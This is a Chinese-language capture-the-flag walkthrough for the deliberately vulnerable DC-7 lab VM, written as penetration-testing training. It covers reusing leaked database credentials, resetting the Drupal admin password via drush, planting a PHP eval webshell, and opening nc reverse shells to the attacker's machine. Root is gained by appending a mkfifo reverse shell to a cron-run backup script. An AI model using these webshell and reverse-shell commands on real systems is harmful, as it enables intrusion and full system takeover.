靶场介绍

About Release

Back to the Top

描述

DC-7 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。

虽然这不是一个过于技术性的挑战,但也并不容易。

虽然这是较早的 DC 版本的一种合乎逻辑的进展(我不会告诉你是哪一个),但其中涉及到一些新概念,但你需要自己弄清楚这些。:-) 如果您需要使用暴力破解或字典攻击,您可能不会成功。

您需要做的是跳出框框思考。

Waaaaaay“在盒子外面”。:-)

这一挑战的最终目标是获得根并阅读唯一的标志。

必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。

对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7 上给我发推文,寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。

技术信息

DC-7 是基于 Debian 64 位构建的 VirtualBox VM,但在大多数 PC 上运行它应该没有任何问题。

我已经在 VMWare Player 上对此进行了测试,但如果在 VMware 中运行此 VM 有任何问题,请通读.

它当前配置为桥接网络,但是,可以根据您的要求进行更改。网络配置为 DHCP。

安装很简单 - 下载它,解压缩,然后将它导入 VirtualBox 或 VMWare,然后就可以了。

nmap扫描

image-20220914122316692

1
2
kali 192.168.169.220
dc-7 192.168.169.230

扫描目标ip

image-20220914122511348

  • http ssh

访问

image-20220914122822355

  • 因为这次提示说暴力破破解不适用,所以要换个思路

源码

image-20220914123411399

  • 百度一下
1
https://github.com/Dc7User/staffdb

image-20220914123150278

image-20220914123239923

下载源码

image-20220914123601974

  • 找一些信息
1
2
3
4
5
6
7
<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

ss登录

  • 根据上面的账号登录

image-20220914123843715

  • 登陆成功

backups

image-20220914124038799

1
ls一下看见了两个文件 一个backups 一个mobx进入backups文件夹,发现两个文件

image-20220914124201981

mobx

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3EPu-0000CV-5C
        for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:15:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:15:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3EeF-0000Dx-G1
        for root@dc-7; Thu, 29 Aug 2019 17:15:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EeF-0000Dx-G1@dc-7>
Date: Thu, 29 Aug 2019 17:15:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:30:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:30:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3Esl-0000Ec-JQ
        for root@dc-7; Thu, 29 Aug 2019 17:30:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Esl-0000Ec-JQ@dc-7>
Date: Thu, 29 Aug 2019 17:30:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:45:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:45:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3F7H-0000G3-Nb
        for root@dc-7; Thu, 29 Aug 2019 17:45:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3F7H-0000G3-Nb@dc-7>
Date: Thu, 29 Aug 2019 17:45:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 20:45:21 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 20:45:21 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3Hvd-0000ED-CP
        for root@dc-7; Thu, 29 Aug 2019 20:45:21 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Hvd-0000ED-CP@dc-7>
Date: Thu, 29 Aug 2019 20:45:21 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 22:45:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 22:45:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3Jng-0000Iw-Rq
        for root@dc-7; Thu, 29 Aug 2019 22:45:16 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Jng-0000Iw-Rq@dc-7>
Date: Thu, 29 Aug 2019 22:45:16 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Thu Aug 29 23:00:12 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 23:00:12 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3K28-0000Ll-11
        for root@dc-7; Thu, 29 Aug 2019 23:00:12 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3K28-0000Ll-11@dc-7>
Date: Thu, 29 Aug 2019 23:00:12 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3LCo-0000Eb-02
        for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3O0y-0000Ed-To
        for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]
  • 发现在/opt/scripts/ 有个可以执行的脚本文件 backups.sh

image-20220914124622499

  • 进入/opt/scripts/查看

image-20220914124815236

  • 一封邮件?(暂时先不管)

image-20220914124921191

  • drushdrupal shell 专门管理drupal站点的shell

image-20220914125207147

  • 进入到/var/www/html目录下,使用drush命令修改admin用户的密码为admin

image-20220914125508458

1
drush user-password admin --password='admin'

image-20220914130019573

1
2
3
4
There have been more than 5 failed login attempts for this account. It is temporarily blocked. Try again later or request a new password.
此帐户已尝试登录失败5次以上。它被暂时封锁了。请稍后再试或请求新密码。

解决方法:使用命令:drush php-eval 'db_query("DELETE FROMflood");' 登入成功!!!
  • 上面的一封信
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
dc7user@dc-7:/var/mail$ cat dc7user 
From root@dc-7 Wed Sep 14 14:30:10 2022
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Wed, 14 Sep 2022 14:30:10 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1oYK2M-0000HX-Me
        for root@dc-7; Wed, 14 Sep 2022 14:30:10 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1oYK2M-0000HX-Me@dc-7>
Date: Wed, 14 Sep 2022 14:30:10 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Wed Sep 14 14:45:05 2022
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Wed, 14 Sep 2022 14:45:05 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1oYKGn-0000Ig-Ci
        for root@dc-7; Wed, 14 Sep 2022 14:45:05 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1oYKGn-0000Ig-Ci@dc-7>
Date: Wed, 14 Sep 2022 14:45:05 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Wed Sep 14 15:00:05 2022
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Wed, 14 Sep 2022 15:00:05 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1oYKVJ-0000KR-5Z
        for root@dc-7; Wed, 14 Sep 2022 15:00:05 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1oYKVJ-0000KR-5Z@dc-7>
Date: Wed, 14 Sep 2022 15:00:05 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Wed Sep 14 15:15:05 2022
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Wed, 14 Sep 2022 15:15:05 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1oYKjp-0000LO-Bg
        for root@dc-7; Wed, 14 Sep 2022 15:15:05 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1oYKjp-0000LO-Bg@dc-7>
Date: Wed, 14 Sep 2022 15:15:05 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Wed Sep 14 15:30:05 2022
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Wed, 14 Sep 2022 15:30:05 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1oYKyL-0000M8-FW
        for root@dc-7; Wed, 14 Sep 2022 15:30:05 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1oYKyL-0000M8-FW@dc-7>
Date: Wed, 14 Sep 2022 15:30:05 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

进入网站后台

image-20220914130250894

登入成功找到 在Content—>Add content–>Basic page下 需要添加一个PHP模板

1
2
https://www.drupal.org/project/php  # 插件下载地址
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz #模块包

image-20220914130802690

image-20220914130903628

image-20220914131017726

image-20220914131029489

  • 搜索php 点击安装

image-20220914131620408

  • 安装成功

image-20220914131656845

  • 添加一句话,不要忘记点击save
1
2
3
4
GetShell
<?php
@eval($_REQUEST[cmd]);
?>

image-20220914131931124

  • 连接

image-20220914132238640

image-20220914132304474

  • shell反弹到kali
  1. kali 监听

image-20220914132443810

  1. 蚁剑
1
nc 192.168.169.220 4444 -e /bin/sh

image-20220914132838453

  1. 设置交互
1
python -c 'import pty;pty.spawn("/bin/bash")'

image-20220914132925247

提权

  • /opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell
1
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.169.220 1234 >/tmp/f" >> backups.sh
  1. kali 监听

image-20220914134201445

  1. 执行命令 - (记住要填写kali的ip)

image-20220914140505217

  1. 这个shell反弹会很慢.

  2. 反弹回来

    1
    python -c 'import pty;pty.spawn("/bin/bash")'

  3. cat /root/theflag.txt